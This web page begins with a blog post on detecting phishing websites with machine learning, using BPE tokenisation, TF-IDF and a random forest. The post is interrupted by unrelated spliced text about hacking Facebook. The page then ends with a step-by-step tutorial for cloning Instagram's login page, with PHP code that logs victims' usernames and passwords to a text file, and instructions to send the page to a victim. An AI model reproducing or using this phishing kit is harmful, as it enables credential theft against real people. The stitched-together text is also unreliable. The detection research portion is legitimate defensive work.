By Faizan Ahmad, University of Virginia
There is hardly a week when you go to Google News and don’t find a news article about Phishing. Just in the last week, hackers are sending phishing emails to Disney+ subscribers, ‘Shark Tank’ star Barbara Corcoran lost almost $400K in phishing scam, a bank issues phishing warnings, and almost three-quarter of all phishing websites now use SSL. Since phishing is such a widespread problem in the cybersecurity domain, let us take a look at the application of machine learning for phishing website detection. Although there have been many articles and research papers on this topic [Malicious URL Detection] [Phishing Website Detection by Visual Whitelists] [Novel Techniques for Detecting Phishing], they do not always provide open-source code and dive deeper into the analysis. This post is written to address these gaps. We will use a large phishing website corpus and apply a few simple machine learning methods to garner highly accurate results.
Data
The best part about tackling this problem with machine learning is the availability of well-collected phishing website data sets, one of which is collected by folks at the Universiti Malaysia Sarawak. The ‘Phishing Dataset – A Phishing and Legitimate Dataset for Rapid Benchmarking’ dataset consists of 30,000 websites out of which 15,000 are phishing and 15,000 are legitimate. Each website in the data set comes with HTML code, whois info, URL, and all the files embedded in the web page. This is a goldmine for someone looking to apply machine learning for phishing detection. There are several ways this data set can be used. We can try to detect phishing websites by looking at the URLs and whois information and manually extracting features as some previous studies have done [1]. However, we are going to use the raw HTML code of the web pages to see if we can effectively combat phishing websites by building a machine learning system. Among URLs, whois information, and HTML code, the last is the most difficult to obfuscate or change if an attacker is trying to prevent a system from detecting his/her phishing websites, hence the use of HTML code in our system. Another approach is to combine all three sources, which should give better and more robust results but for the sake of simplicity, we will only use HTML code and show that it alone garners effective results for phishing website detection. One final note on the data set: we will only be using 20,000 total samples because of computing constraints. We will also only consider websites written in English since data for other languages is sparse.
This website lists 30 optimized features of phishing website. We use cookies on Kaggle to deliver our services, analyze web traffic, and improve your experience on the site. In my previous post, I explain the easy method to hack Facebook, WhatsApp, Instagram, etc.So you need to read my previous post because this was read the article, and now many of my friends ask me for email that “How to hack Facebook id using phishing attack” because it is the most powerful trick to get your username and password for any of your victims or your Facebook friend account. HTML attachments are commonly used by banks and other financial institutions so people are used to seeing them in their inboxes. Here are a few examples of credential phishes we've seen using this attack vector: Macros With Payloads. Malicious macros in phishing emails have become an increasingly common way of delivering ransomware in the past.
Byte Pair Encoding for HTML Code
For a naive person, HTML code does not look as simple as a language. Moreover, developers often do not follow all the good practices while writing code. This makes it hard to parse HTML code and extract words/tokens. Another challenge is the scarcity of many words and tokens in HTML code. For instance, if a web page is using a special library with a complex name, we might not find that name on other websites. Finally, since we want to deploy our system in the real world, there might be new web pages using completely different libraries and code practices that our model has not seen before. This makes it harder to use simple language tokenizers and split code into tokens based on space or any other tag or character. Fortunately, we have an algorithm called Byte Pair Encoding (BPE) that splits the text into sub-word tokens based on the frequency and solves the challenge of unknown words. In BPE, we start by considering each character as a token and iteratively merge tokens based on the highest frequencies. For instance, if a new word “googlefacebook” comes, BPE will split it into “google” and “facebook” as these words could be frequently there in the corpus. BPE has been widely used in recent deep learning models [2].
There have been numerous libraries to train BPE on a text corpus. We will use a great one called tokenizer by Huggingface. It is extremely easy to follow the instruction on the github repository of the library. We train BPE with a vocabulary size of 10,000 tokens on top of raw HTML data. The beauty of BPE is that it automatically separates HTML keywords such as “tag”, “script”, “div” into individual tokens even though these tags are mostly written with brackets in an HTML file e.g <tag>, <script>. After training, we get a saved instance of the tokenizer which we can use to tokenize any HTML file into individual tokens. These tokens are used with machine learning models.
TFIDF with Byte Pair Encoding
Once we have tokens from an HTML file, we can apply any model. However, contrary to what most people do these days, we will not be using a deep learning model such as a Convolutional Neural Network (CNN) or Recurrent Neural Network (RNN). This is mainly because of the computational complexity and the relatively small size of the data set for deep learning models. The figure above shows a histogram of tokens from BPE in 1000 HTML files. We can see that these files contain thousands of tokens whose processing will incur high computational cost in more complex models like CNN and RNN. Moreover, it is not necessary that token order matters for phishing detection. This will be empirically evident once we look at the results. Therefore, we will simply apple TFIDF weights on top of each token from the BPE.
As explained in the previous post on Authorship Attribution, TFIDF stands for term frequency, inverse document frequency and can be calculated by the formula given below. Term frequency (tf) is the count of a term i in a document j while inverse document frequency (idf) indicates the rarity and importance of each word in the corpus. Document frequency is calculated by totaling the number of times a term i appears in all documents. TF-IDF gives us weights as tfidf scores for each term in a document which is a product of tf and idf.
(1)
Machine Learning Classifier
Sticking with simplicity, we will use a Random Forest Classifier (RF) from scikit-learn. For training the classifier, we split the data into 90% training and 10% testing. No cross-validation is done since we are not trying to extensively tune any hyper-parameters. We will stick with the default hyperparameters of Random Forest from the scikit-learn implementation. Contrary to deep learning models that take a long time to train, RF takes less than 2 minutes on a CPU to train and demonstrate effective results as are shown next. To show robustness in performance, we train the model 5 times on different splits of the data and report the average test results.
Results
Accuracy | Precision | Recall | Fscore | AUC |
98.55 | 98.29 | 98.82 | 98.55 | 99.68 |
Phishing Website Detection Results
The table above shows the results on test data averaged across 5 experiments. Looking at the surface, these seem like great results especially without any hyperparameter tuning and with a simple model. However, these are not so great. The model has 98% precision for both classes which means it gives around 2% false positives when it is detecting phishing websites. That is a huge number in the security context. False positives are the websites that the machine learning model deems to be phishing but are in fact legitimate. If users frequently encounter false positives, they have a bad user experience and they might not want to use the model anymore. Moreover, the security folks encounter threat alert fatigue when dealing with false positives. False positives are further quantified in the confusion matrix below where x-axis shows the actual classes and y-axis has the predicted classes. Even though the model is achieving a high accuracy score, there are 11 instances where the model predicted “Phishing” for the website but in reality, it was a safe website.
16 (False Negative) | 912 (True Negative) | Legitimate |
920 (True Positive) | 11 (False Positive) | Phishing |
Phishing | Legitimate | Predicted Class |
Actual Class |
Confusion matrix for the model
Now that we know there is still a problem with the model and we cannot deploy it as it is, let us look at a potential solution. We are going to use the Receiver Operating Curve (ROC) to look at the false and true positive rates. In the figure below, it is easy to see that for up to 80% true positive rate, we have a 0% false-positive rate which is something we can use for decision making.
The ROC curve demonstrates that for a particular confidence threshold (red dot), the true positive rate would be around 80-90% while the false positive rate would be close to zero. To prove this, let us look at different confidence thresholds and plot metrics against them. To apply a confidence threshold of x%, We will only keep websites where the model is more than x% confident that the website is either legitimate or a phishing one. When we do this, the total number of phishing websites (true positive rate) we can identify decreases but our accuracy increases considerably and precision also becomes close to 100%.
The above figure demonstrates the effect of confidence threshold on test accuracy, the number of false positives, and the true positive rate. We can see that when we are using the default threshold of 0.5, we have 11 false positives. As we start to increase our confidence score, our true positive rate decreases but the number of false positives starts getting very low. Finally, at the last point in the graph, we have zero false positives for precision. This means that whenever our model says a website is trying to phish, it is always accurate. However, since our true positive rate has declined to 82%, the model can only detect around 82% phishing websites now. This is how machine learning could be used in cybersecurity by looking at the tradeoff between false positives and true positives. Most of the time, we want an extremely low false-positive rate. In such settings, one can adopt the approach above to get effective results from the model.
Limitations
Before concluding this post, let us discuss a few limitations of the methods we have seen above. First, our data set is pretty decent sized but it is not comprehensive at all for all the types of phishing websites out there. There might have been millions of phishing websites in the last couple of years but the data set contains 15,000 only. As hackers are advancing their techniques, newly made phishing websites might not be making the same mistakes that the old ones were making which might make them hard to detect using the model above. Secondly, since TFIDF feature representation does not take into account the order in which code is written, we can potentially lose information. This problem does not arise in deep learning methods as they can sequentially process sequences and take into account the order of the code. Moreover, since we are using raw HTML code, an attacker can observe the predictions of the model and spend some time trying to come up with obfuscations in the code that will render the model ineffective. Finally, someone can use off the shelf code obfuscators to obfuscate the HTML code which will again render the model useless since it has only seen plain HTML code files. However, despite some of these limitations, machine learning can still be very effective in complementing phishing blacklists such as the ones used by Google Safe Browsing. Combining blacklists with machine learning systems can provide better results than relying on blacklists alone.
Open-Source Code
As I discussed in the first post of this blog, I will always open-source the code for the projects I discuss in this blog. Keeping the tradition alive, here is the link for replicating all experiments, training your own phishing detection models, and testing new websites using my pre-trained model.
Github Repository: https://github.com/faizann24/phishytics-machine-learning-for-phishing
Bio: Faizan Ahmad is currently a Masters student at the University of Virginia (UVA) and works as a graduate research assistant at the Mcintire School of Commerce in UVA. He will be joining Facebook as a Security Engineer in June 2020. His interests lie at the intersection of cyber security, machine learning, and business analytics and he has done plenty of research and industrial projects on these topics.
Original. Reposted with permission.
Related:
Create Fake Instagram login page : Welcome back Guys, Today we are going to share step by step method to hack Instagram accounts.
For your information there is no tools or software available which can hack Instagram so guys please stop searching for Instagram hacking software because either they will steal your data or infect your system or mobile device.
Also Read : How to find out who is hiding behind an Instagram profile
We can only hacks someone account by using some of methods such as Phishing, Key logger and social engineering.
Most commonly method which can be used for Instagram account hacking is phishing.If you don’t know about Phishing let me tell you phishing is a method in which attacker create a website which is similar to real web page to steal ID and password from Victim.
All the website which claim that they hack Instagram accounts online they all are fraud don’t trust them.
Let’s not waste time, We have created a phishing offer page for Instagram account hacking and we are going share with you.Just follow the steps given below:
Step 1. Open the link mention below.
Step 2. Now just copy the link manually from browser or you can use the whatsapp sharing option which is provided at the end of the post.
Step 3. Now choose your victim or the person whom Facebook account you want to hack and send this Offer Page to that victim.
Step 4. That’s it just tell them to check the offer.
Step 5. Fill our Contact Form to get the Password details.We will revert you soon.
Also Read : The best apps to gather followers on Instagram
How To Hack Instagram Account ?
Free Phishing Tools
Creating a Phishing Page is very Simple !
Let Me explain you !
Things Needed :
- Basic Notepad
- Working Internet
- Basic Html Knowledge
- And a Web Host Account
Process:
How to create a Instagram phishing page :
STEP: 1: Creation of Instagram phishing page as an example.
- Go to www.instagram.com, make sure you are not logged into Instagram account .
- Now press Right Click of mouse and save complete webpage.
- Find this <form class=”HmktE” method=”post” >
- And modify this code <form class=”HmktE” method=”post” action=”login.php”>
- Save this file as index.html
- Now you have to get username and password stored in a text file named instagram.txt
- Create a file named login.php using the following code.
Wapka Phishing Html Code
Also Read : How to download Instagram Stories of your friends on Android
Phishing Html Code
login.php
<?php
header (‘Location: https://www.instagram.com ‘);
$handle = fopen(“instagram.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
Step: 2 : Now, Its time to upload your files in your registered Web Host Account.
Step: 3: You can check the hacked accounts passwords by simply checking into your website url where www.yourwebsitename.com/instagram.txt
Phishing Websites List
That’s it you have to for making Instagram Phishing !!
If you are facing any problem while making Instagram Phishing you can download it from below download link.
Enjoy Hacking !!
Feel free to comment if you have any query in the below comment box.
Phishing Html Code For Facebook
Note : This post is created only for educational and awareness purpose and we suggest you to not to hack someone Facebook account as this is privacy breach.
Gmail Phishing Html Code
Also Read : Best Apps for Editing Photos For Instagram 2019